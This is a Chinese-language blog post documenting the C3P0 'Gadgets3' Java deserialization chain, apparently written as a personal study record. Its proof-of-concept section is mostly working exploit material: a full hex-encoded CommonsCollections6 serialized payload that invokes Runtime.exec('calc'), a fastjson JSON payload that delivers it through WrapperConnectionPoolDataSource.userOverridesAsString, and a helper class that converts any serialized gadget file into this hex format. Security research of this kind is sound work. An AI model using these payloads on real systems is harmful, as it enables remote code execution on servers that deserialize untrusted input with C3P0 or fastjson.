Java反序列化 C3P0 GadGets3利用链记录(字节码读取)

最新推荐文章于 2024-05-22 09:56:54 发布
最新推荐文章于 2024-05-22 09:56:54 发布
阅读量237 收藏
点赞数
分类专栏: Java反序列化利用链 文章标签: java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/LTianHang/article/details/128926665
版权
文章详细阐述了如何利用C3P0库中的Gadgets3进行反序列化攻击,包括分析利用链、调试过程以及提供POC。同时,提到了fastjson字节码注入的利用方式,并给出了一段转换字节码到Hex的工具类代码。
摘要由CSDN通过智能技术生成

Java反序列化 C3P0 GadGets3利用链记录

C3P0相关依赖包

解压后放到一个目录即可

c3p0-0.9.5.2.jar
mchange-commons-java-0.2.11.jar

GadGets3利用分析

利用链寻找

com.mchange.v2.c3p0.WrapperConnectionPoolDataSource#WrapperConnectionPoolDataSource(boolean autoregister)
	com.mchange.v2.c3p0.impl.C3P0ImplUtils#parseUserOverridesAsString( String userOverridesAsString )
		com.mchange.v2.ser.SerializableUtils#fromByteArray(byte[] bytes)
			com.mchange.v2.ser.SerializableUtils#deserializeFromByteArray(byte[] bytes) 触发原生反序列化操作

最后的利用点 向前寻找

image-20230207204212004

开始调试

调试过一遍就会理解 此链不难 就是将UserOverridesAsString的值进行了原生序列化操作 直接使用cc6序列化进行操作

image-20230207212921251

image-20230207213623197

image-20230207213638390

image-20230207213249817

image-20230207213343975

POC

普通字节码注入

Hex为calc代码 不放心可自己生成

String cc6_exp = "HexAsciiSerializedMap:ACED0005737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000C77080000001000000001737200346F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6B657976616C75652E546965644D6170456E7472798AADD29B39C11FDB0200024C00036B65797400124C6A6176612F6C616E672F4F626A6563743B4C00036D617074000F4C6A6176612F7574696C2F4D61703B787074000231327372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657230C797EC287A97040200015B000D695472616E73666F726D65727374002D5B4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707572002D5B4C6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E5472616E73666F726D65723BBD562AF1D83418990200007870000000047372003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436F6E7374616E745472616E73666F726D6572587690114102B1940200014C000969436F6E7374616E7471007E00037870767200116A6176612E6C616E672E52756E74696D65000000000000000000000078707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E496E766F6B65725472616E73666F726D657287E8FF6B7B7CCE380200035B000569417267737400135B4C6A6176612F6C616E672F4F626A6563743B4C000B694D6574686F644E616D657400124C6A6176612F6C616E672F537472696E673B5B000B69506172616D54797065737400125B4C6A6176612F6C616E672F436C6173733B7870757200135B4C6A6176612E6C616E672E4F626A6563743B90CE589F1073296C02000078700000000274000A67657452756E74696D65707400096765744D6574686F64757200125B4C6A6176612E6C616E672E436C6173733BAB16D7AECBCD5A99020000787000000002767200106A6176612E6C616E672E537472696E67A0F0A4387A3BB34202000078707671007E001C7371007E00137571007E0018000000027070740006696E766F6B657571007E001C00000002767200106A6176612E6C616E672E4F626A656374000000000000000000000078707671007E00187371007E00137571007E00180000000174000463616C63740004657865637571007E001C0000000171007E001F7371007E00003F4000000000000C770800000010000000007878737200116A6176612E6C616E672E496E746567657212E2A0A4F781873802000149000576616C7565787200106A6176612E6C616E672E4E756D62657286AC951D0B94E08B02000078700000007B780";
        WrapperConnectionPoolDataSource wrapperConnectionPoolDataSource = new WrapperConnectionPoolDataSource(true);
        wrapperConnectionPoolDataSource.setUserOverridesAsString(cc6_exp);

image-20230207214946508

fastjson字节码注入
String poc = "{\n" +
        "    \"a\": {\n" +
        "        \"@type\": \"java.lang.Class\",\n" +
        "        \"val\": \"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource\"\n" +
        "    },\n" +
        "    \"b\": {\n" +
        "        \"@type\": \"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource\",\n" +
        "        \"userOverridesAsString\": \"HexAsciiSerializedMap:ACED0005737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000C77080000001000000001737200346F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6B657976616C75652E546965644D6170456E7472798AADD29B39C11FDB0200024C00036B65797400124C6A6176612F6C616E672F4F626A6563743B4C00036D617074000F4C6A6176612F7574696C2F4D61703B787074000231327372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657230C797EC287A97040200015B000D695472616E73666F726D65727374002D5B4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707572002D5B4C6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E5472616E73666F726D65723BBD562AF1D83418990200007870000000047372003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436F6E7374616E745472616E73666F726D6572587690114102B1940200014C000969436F6E7374616E7471007E00037870767200116A6176612E6C616E672E52756E74696D65000000000000000000000078707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E496E766F6B65725472616E73666F726D657287E8FF6B7B7CCE380200035B000569417267737400135B4C6A6176612F6C616E672F4F626A6563743B4C000B694D6574686F644E616D657400124C6A6176612F6C616E672F537472696E673B5B000B69506172616D54797065737400125B4C6A6176612F6C616E672F436C6173733B7870757200135B4C6A6176612E6C616E672E4F626A6563743B90CE589F1073296C02000078700000000274000A67657452756E74696D65707400096765744D6574686F64757200125B4C6A6176612E6C616E672E436C6173733BAB16D7AECBCD5A99020000787000000002767200106A6176612E6C616E672E537472696E67A0F0A4387A3BB34202000078707671007E001C7371007E00137571007E0018000000027070740006696E766F6B657571007E001C00000002767200106A6176612E6C616E672E4F626A656374000000000000000000000078707671007E00187371007E00137571007E00180000000174000463616C63740004657865637571007E001C0000000171007E001F7371007E00003F4000000000000C770800000010000000007878737200116A6176612E6C616E672E496E746567657212E2A0A4F781873802000149000576616C7565787200106A6176612E6C616E672E4E756D62657286AC951D0B94E08B02000078700000007B780\"\n" +
        "    }\n" +
        "}";
JSON.parseObject(poc);

image-20230207214904102

转Hex工具类

package c3p0;

import java.io.FileInputStream;
import java.io.IOException;
import java.io.InputStream;

public class SerToHex {

    public static void main(String[] args) throws IOException, ClassNotFoundException, IOException {
        System.out.println("hello");
        InputStream in = new FileInputStream("cc6.bin");
        byte[] data = toByteArray(in);
        in.close();
        String HexString = bytesToHexString(data, data.length);
        System.out.println("HexAsciiSerializedMap:" + HexString + "0");

    }

    public static byte[] toByteArray(InputStream in) throws IOException {
        byte[] classBytes;
        classBytes = new byte[in.available()];
        in.read(classBytes);
        in.close();
        return classBytes;
    }

    public static String bytesToHexString(byte[] bArray, int length) {
        StringBuffer sb = new StringBuffer(length);

        for (int i = 0; i < length; ++i) {
            String sTemp = Integer.toHexString(255 & bArray[i]);
            if (sTemp.length() < 2) {
                sb.append(0);
            }

            sb.append(sTemp.toUpperCase());
        }
        return sb.toString();
    }
}

文章不足之处恳请大佬们多多指正 !!!

keleth
关注
专栏目录
从某比赛题目ezgadgets复现看java反序列化
weixin_44687621的博客
11-29 3402
我们平常在使用ysoserial这样的工具时,并不会太在意payload是如何生成的。反正工具一把梭就完事了,但是出题人总是想尽办法不让我们使用工具。所以没办法,只能自己写了。 题目复现给出源码结构如下 controller作为控制器,并且只有一个class,那么漏洞点肯定在这里面。给出代码如下 readObject是典型的java反序列化,这里的输入流可控。我们传入data后,会将数据直接存放到ObjectInputStream对象中。 这里直接使用ysoserial,很容易发现存在一个问题,就是这里
初识Java反序列化
m0_71563599的博客
06-04 1608
研究某产品反序列化EXP时,搜集到的POC只有一段16进制字节序列难以利用,遂有下文对Java序列化和反序列化的学习。大致内容如下:序列化和反序列化示例序列化数据组成解构反序列化漏洞形成原理序列化: 将程序运行时所需要的Java对象转化为字节序列并存储在文件系统中,一般为.ser后缀的文件,ObjectOutputStream.writeObject()方法可以将对象序列化。反序列化: 将存储在文件系统的字节序列转化成对象供程序使用,ObjectInputStream.readObject()方法可以将字节
Gadgets-JavaBase64加密解密
Matrix
07-12 331
BASE64加密解密 // 加密方法 public String encode(String str) { byte[] b = null; String s = null; try { b = str.getBytes("utf-8"); } catch (Unsuppo
探索Java安全边界:Gadgets - 漏洞复现与研究的宝库
最新发布
gitblog_00035的博客
05-22 448
探索Java安全边界:Gadgets - 漏洞复现与研究的宝库 Gadgets Java反序列化漏洞利用补全计划,仅用于个人归纳总结。 项目地址: https://gitcode.com/gh_mirrors/ga/Gadgets ...
反序列化整理
weixin_54225453的博客
08-26 195
在PHP反序列化漏洞利用技术POP中,对应的初始化gadgets就是wakeup() 或者是destruct() 方法, 在最理想的情况下能够实现漏洞利用的点就在这两个函数中,但往往我们需要从这个函数开始,逐步的跟进在这个函数中调用到的所有函数,直至找到可以利用的点为止。在反序列化中,我们所能控制的数据就是对象中的各个属性值,所以在PHP的反序列化有一种漏洞利用方法叫做 “面向属性编程” ,即 POP( Property Oriented Programming)。换句话说,将保留对象的属性及其分配的值。.
Java反序列化 C3P0 GadGets1利用记录(URLClassLoader)
LTianHang的博客
02-06 280
Java反序列化 C3P0 GadGets1利用记录分析
基于混合分析的Java反序列化利用挖掘方法.docx
05-27
序列化是将Java对象转换为可存储或传输的形式(如字节序列、JSON字符串或XML字符串),而反序列化则是这一过程的逆向操作。在许多应用场景中,如远程过程调用(RPC)或HTTP请求参数处理时,反序列化操作频繁出现。例如...
Java “后反序列化漏洞” 利用思路1
08-03
Java "后反序列化漏洞"是指在程序进行反序列化操作之后,恶意构造的序列化对象能够触发非预期的行为,通常包括执行任意代码。这种漏洞常见于Java平台,因为Java的序列化机制允许对象状态的持久化,但也为攻击者提供...
java安全 反序列化(二)
sechelper的博客
12-07 610
java反射,CC6源码分析,LazyMap利用连,ysoserial工具
ysoserial,用于生成利用不安全Java对象反序列化的有效负载的概念验证工具。.zip
10-13
YSOSerial工具由Gadgets项目提供支持,它包含了多个预定义的“gadgets”,这些gadgetsJava类中的方法,当反序列化发生时,它们可以被用来执行攻击者想要的操作。这些gadgets通常是由于类设计不当时遗留下来的,...
Gadgets开发实例及教程
06-09
自己为了方便查找联系人写的一个边栏小工具,主要是查询Win7的联系人,在Win7环境下测试通过,因为Gadget的资料较少,所以给大家分享一下,另外没有做美工。 此工具是结合C#来写,C#实现后台的查询和返回工作,结果显示使用Ajax和GadgetsAPI。 项目是使用VS2010开发的,自己在部署时,先创建虚拟目录,指向Publish,里面的Default.htm是我调试用的,可以删除。另外Win7的联系人目录(X:\XXX\XXXX\Contacts)的权限要进行设置,IIS_USERS一定要有读取和运行的权限,不然会报错。GetContacts.gadget在指定目录解压,在小工具里添加到桌面上就可以用了。 资源除原码外,还有自己在网上找的一些Gadgets开发的资料,一起分享给大家,希望能有些帮助。
一个简单的Gadget
03-09
一个简单的Gadget
Javaweb安全——反序列化漏洞-C3P0
weixin_43610673的博客
10-25 2177
C3P0是一个开源的JDBC连接池,它实现了数据源与JNDI绑定,支持JDBC3规范和实现了JDBC2的标准扩展说明的Connection和Statement池的DataSources对象。即将用于连接数据库的连接整合在一起形成一个随取随用的数据库连接池(Connection pool)。..............自下向上的调用,从lookup看着像一个jndi注入,调用比较短,直接静态审计源码试试。还原属性赋值跟到的内部类的方法。
Java 反序列化C3P0 学习
蚁景网安学院
10-10 768
图片有点多,请耐心阅读哦0x01 前言再多打一点基础吧,后续打算先看一看 XStream,Weblogic,strusts2 这些个0x02 C3P0 组件介绍C3P0 是一个开源的 JDBC 连接池,它实现了数据源和 JNDI 绑定,支持 JDBC3 规范和 JDBC2 的标准扩展。目前使用它的开源项目有 Hibernate,Spring 等。JDBC 是 Java DataBase Conne...
【Web】浅聊Java反序列化C3P0——不出网Hex字节码加载利用
uuzeray的博客
03-08 963
不出网的情况下,这个C3P0Gadget可以和fastjson,Snake YAML , JYAML,Yamlbeans , Jackson,Blazeds,Red5, Castor等配合使用(调用setter和初始化方法)
[Java反序列化]—C3P0反序列化
Sentiment的博客
11-11 1429
文章首发于先知社区:https://xz.aliyun.com/t/11830
Hex编码与解码
热门推荐
瑜媛的专栏
10-14 2万+
一、Hex编码简介 二、Hex编码与解码实现 static const char hex_table_uc[16] = { '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'A
二次反序列化 看我一命通关
msbz7的博客
08-17 793
不记得是哪一场比赛了,遇到了一个 Java 的题目,过滤了很多关键类,不管小编把 CC 如何拆开组合,都没有办法绕过。就在此时,大佬看了一眼说,用二次反序列化就可以绕过了。“二次反序列化”这六个字重重地敲在了我的心巴上,从那以后我就对二次反序列化产生了莫名的渴望。小编开始详细学习时,发现没有二次反序列化比较系统的学习文章,那么,就自己总结一个。简单介绍下二次反序列化,顾名思义,就是反序列化两次,其主要意义是PS:本文用到的工具类会放在文末它,是下一个用于创建真实运行时对象的类,更具体地说,...
C3P0反序列化学习
虚幻私塾
04-21 1680
🚀 优质资源分享 🚀 学习路线指引(点击解锁) 知识定位 人群定位 🧡 Python实战微信订餐小程序 🧡 进阶级 本课程是python flask+微信小程序的完美结合,从项目搭建到腾讯云部署上线,打造一个全栈订餐系统。 💛Python量化交易实战💛 入门级 手把手带你打造一个易扩展、更安全、效率更高的量化交易系统 C3P0 c3p0第一次听闻是用于fastjson的回显上,大佬们总结三种方法,后面两种主要就是用于fastjson和jackjson的回显利用(注入内存马) http
Java安全:深入解析反序列化漏洞
Java编程中,反序列化是一个将字节流转换回对象的过程,这在处理网络通信、持久化存储等场景中非常常见。然而,不恰当的反序列化处理可能导致严重的安全漏洞。这篇文章聚焦于Java反序列化安全的第二部分,讨论如何...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值